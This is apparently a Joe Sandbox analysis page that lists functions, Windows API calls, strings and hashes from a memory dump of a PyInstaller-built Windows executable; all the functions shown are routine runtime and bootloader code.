Warning [ANSI Fallback], xrefs: 00007FF666DD2B0F

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: cae012d1d034f3ce22a0e87df02c496ec419fb7ab00a951dc5d64d6df9ba5a68
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 7C215172A18B8192E6209B61F8417E663B4FB887C4F400236FE8D9B659DF3DD5458F40

Function 00007FF666DEB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF666DEB1CF
FlsGetValue.KERNEL32 ref: 00007FF666DEB1E4
FlsSetValue.KERNEL32 ref: 00007FF666DEB205
FlsSetValue.KERNEL32 ref: 00007FF666DEB232
FlsSetValue.KERNEL32 ref: 00007FF666DEB243
FlsSetValue.KERNEL32 ref: 00007FF666DEB254
SetLastError.KERNEL32 ref: 00007FF666DEB26F

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: 853637db11dacbf442897c7963e8a1844bd0c4c78a77a647784e8961f7ff704e
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: 40216A20E0C7C2C2FA646362765123DA1725F947A0F444734E87ECEADADE3FB4008B00

Function 00007FF666DF7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF666DF7E0D
GetLastError.KERNEL32 ref: 00007FF666DF7E19
CloseHandle.KERNEL32 ref: 00007FF666DF7E31
CreateFileW.KERNEL32 ref: 00007FF666DF7E5C
WriteConsoleW.KERNEL32 ref: 00007FF666DF7E7B

Strings

CONOUT$, xrefs: 00007FF666DF7E3D

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 8b0c28a80a72a8ed25033cdba805291bd1a556661a65c63c0b4c2fec9351ab73
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: FD115E21A18A82C6E7508B52F89436976B0FB98BE4F044334EA5DCF7A4DF7ED8548B40

Function 00007FF666DD8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF666DD9216), ref: 00007FF666DD8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF666DD9216), ref: 00007FF666DD85E9

Part of subcall function 00007FF666DD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF666DD45E4,00000000,00007FF666DD1985), ref: 00007FF666DD9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF666DD9216), ref: 00007FF666DD8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF666DD9216), ref: 00007FF666DD86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF666DD9216), ref: 00007FF666DD86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF666DD9216), ref: 00007FF666DD870A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 078d661f8eaf6e022ae6d59c30a26d1e068fabe9194b55e94660699a13aaf884
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 20418062B19682E1EA31AB11B5406AA63B4FB84BD4F441235DF8DDFB89DE3DE501CF00

Function 00007FF666DEB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB347
FlsSetValue.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB37D
FlsSetValue.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB3CC
SetLastError.KERNEL32(?,?,?,00007FF666DE4F81,?,?,?,?,00007FF666DEA4FA,?,?,?,?,00007FF666DE71FF), ref: 00007FF666DEB3E7

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: c812eb2b638f0bc06b628a3035b1c7cfe6e9e1413e3a669442bb45899b6bb270
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: D011F720A0C7C2C3FA546722769223DA2729F887A0F544734E97ECE6D6DE3FB4018B41

Function 00007FF666DD2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF666DD1B6A), ref: 00007FF666DD295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF666DD2966
Error [ANSI Fallback], xrefs: 00007FF666DD29FF
%s: %s, xrefs: 00007FF666DD29E8
Error, xrefs: 00007FF666DD2A0E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 7558b8fb07c7dfe4b0004129d78cd2f7017b4db4f632513e09c25d92c2022641
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: ED31C422B1868192E720A765BC406E662A5BFC87D8F400232EE8DCF795EF3DD5468B00

Function 00007FF666DD2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF666DD23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF666DD248E
DeleteObject.GDI32 ref: 00007FF666DD24C1
DestroyIcon.USER32 ref: 00007FF666DD24D3

Strings

Unhandled exception in script, xrefs: 00007FF666DD23F8

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 61b5996e4ba6e7831efe39a9947b9c27b1d6e0d78ad7600e14bafb953b1e4a48
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: AC311D62619A82C9EB20AB61F8552F96370FF89788F444235EA4D8FB99DF3DD145CB00

Function 00007FF666DD2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF666DD918F,?,00007FF666DD3C55), ref: 00007FF666DD2BA0
MessageBoxW.USER32 ref: 00007FF666DD2C2A

Strings

Warning, xrefs: 00007FF666DD2C1D
[PYI-%d:%ls] , xrefs: 00007FF666DD2BA8
WARNING, xrefs: 00007FF666DD2BAF

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: ab628ec25df33f27cb2c0e113e7213839886ceb9a5498ee2febb3470a67d6109
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: 2321AE62B08B81D2E7219B64F8447AA63B4EB887C4F404236EA8D9F659DE3DD605CB40

Function 00007FF666DD2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF666DD1B99), ref: 00007FF666DD2760

Strings

ERROR, xrefs: 00007FF666DD276F
[PYI-%d:%s] , xrefs: 00007FF666DD2768
Error [ANSI Fallback], xrefs: 00007FF666DD27CF
Error, xrefs: 00007FF666DD27DE

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 481782701efce22bf27600f25f42b772bac5dfb5969e53553469543cac0c133b
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: D0215E72A18B8192E620DB51F8817EAA3B4EF887C4F400236FE8D9B659DF7DD5458F40

Function 00007FF666DE9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF666DE9B1D
GetProcAddress.KERNEL32 ref: 00007FF666DE9B33
FreeLibrary.KERNEL32 ref: 00007FF666DE9B5A

Strings

CorExitProcess, xrefs: 00007FF666DE9B2C
mscoree.dll, xrefs: 00007FF666DE9B14

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 80b8c2734531b4e67ccf0a2027acd3f85ad788312ae17b78c75524c51929d968
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 75F06D61B19B46C2EB108B24F49577A6370EF99761F540335DA6E8E2E4DF3EE048CB40

Function 00007FF666DF93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF666DF9400
_set_statfp.LIBCMT ref: 00007FF666DF941B
_set_statfp.LIBCMT ref: 00007FF666DF9437
_set_statfp.LIBCMT ref: 00007FF666DF9473

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: c1745a84058abc1587d03686f146182430c2b10b0d5fe242ac69b5e9f21ec553
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: F3118F72E5CA1381F6641D28F49637520646FFD374E080B34EA7E8E6D68E3EA9414D08

Function 00007FF666DEB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF666DEA613,?,?,00000000,00007FF666DEA8AE,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEB41F
FlsSetValue.KERNEL32(?,?,?,00007FF666DEA613,?,?,00000000,00007FF666DEA8AE,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEB43E
FlsSetValue.KERNEL32(?,?,?,00007FF666DEA613,?,?,00000000,00007FF666DEA8AE,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEB466
FlsSetValue.KERNEL32(?,?,?,00007FF666DEA613,?,?,00000000,00007FF666DEA8AE,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEB477
FlsSetValue.KERNEL32(?,?,?,00007FF666DEA613,?,?,00000000,00007FF666DEA8AE,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEB488

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: 64b0ebe4845d27a952939ca9b8e47ccdfe47e8f0b392977b6834a0947678575d
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: CD114F20B0CBC2C2FA5897267651279A1715F887B4F488335E97DCE6D6DE3FB4018B01

Function 00007FF666DEB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF666DEB2A5
FlsSetValue.KERNEL32 ref: 00007FF666DEB2C4
FlsSetValue.KERNEL32 ref: 00007FF666DEB2EC
FlsSetValue.KERNEL32 ref: 00007FF666DEB2FD
FlsSetValue.KERNEL32 ref: 00007FF666DEB30E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: 615ac51193b0d44b6790de05d67ac4d1dd55df940d7e99e4f1e2f9d09fd48e05
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: D6111520E0C387C6FAA863227A5227A91724F95330F488734E97ECE2D2DD3FB4018E41

Function 00007FF666DE6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE622C

Strings

verbose, xrefs: 00007FF666DE6020

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 93e449fd79c9a342b6fc7bbccacc23f56f02a90d21a909fcc7c19ce1032e843e
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 1B91AD22A08AC6C5E7628E66E85037DB7B1AB50B94F444336DB5D8F3D6DF3EE4058B01

Function 00007FF666DEFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DEFF17

Part of subcall function 00007FF666DE7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE7AC9

Strings

ccs, xrefs: 00007FF666DEFE52
UTF-8, xrefs: 00007FF666DEFE96
UTF-16LEUNICODE, xrefs: 00007FF666DEFEB5

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 68d20840cd13c52f6ce636d6f91d6a352b51e154f3bc3a0aa8cb8f9aa7d25786
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 2A819E36E08683C5F7644E25B150278AAB0EB91B48F658235DA0DDF29ADF3FF9019B41

Function 00007FF666DDD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF666DDD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF666DDD77A
RtlUnwindEx.KERNEL32 ref: 00007FF666DDD7D4

Strings

csm, xrefs: 00007FF666DDD761

